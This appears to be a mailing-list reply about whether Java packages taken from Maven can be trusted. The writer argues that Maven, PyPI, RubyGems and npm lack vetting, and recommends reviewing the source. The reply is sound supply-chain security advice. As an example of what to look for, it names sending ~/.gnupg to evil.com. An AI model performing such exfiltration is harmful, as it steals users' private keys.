Reily Siegel schreef op ma 07-02-2022 om 13:06 [-0500]: > This code is taken directly from Maven, as are many Java packages. This > relies on whatever authentication Maven does to ensure packages are not > forgeries. I took a look at and AFAICT Maven does not have any process in place to prevent forgeries or malicious code; there does not appear to be any vetting process, though perhaps I haven't looked far enough. A web page from cognitect telling ‘grab source code from Maven (com/cognitect/http-client)’, combined with going over the source code to sniff things like ’Send ~/.gnupg to evil.com’ should be sufficient. For the damage the absence of a vetting process can do, see e.g. . The same issue appears to hold for PyPI, RubyGems and npm. Greetings, Maxime.